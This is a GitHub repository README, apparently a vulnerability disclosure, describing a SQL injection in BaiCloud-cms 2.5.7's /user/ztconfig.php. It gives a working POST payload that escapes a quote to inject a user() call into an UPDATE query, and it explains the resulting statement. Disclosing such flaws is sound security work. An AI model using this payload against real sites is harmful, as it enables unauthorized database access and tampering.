Skip to content
/ BaiCloud Public
forked from relightsec/BaiCloud

BaiCloud-cms 2.5.7 /user/ztconfig.php SQL injection Vulnerability

0 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

bkfish/BaiCloud

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
README.md
README.md
 
 

Repository files navigation

BaiCloud

BaiCloud-cms 2.5.7 /user/ztconfig.php SQL injection Vulnerability

Link Url : https://github.com/meiko-S/BaiCloud

Edition : lastest(2.5.7)

0x01 Vulnerability (/user/ztconfig.php line 65)

image after user login then post data

POST /user/ztconfig.php
tongji=1\&baidu_map=,baidu_map=user()#&action=modify&bannerheight=1

then get /user/ztconfig.php page can get result image

0x20 Analysis

we set tongji = 1\ and baidu_map=,baidu_map=user()# then the query is

update zzcms_usersetting set comanestyle='',comanecolor='',swf='',daohang='',bannerbg='',bannerheight='1',mobile='0',tongji='1\',baidu_map=',baidu_map=user()#' where username='admin';

this is a legal sql statement image and when get this page,we can get this value.

About

BaiCloud-cms 2.5.7 /user/ztconfig.php SQL injection Vulnerability

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published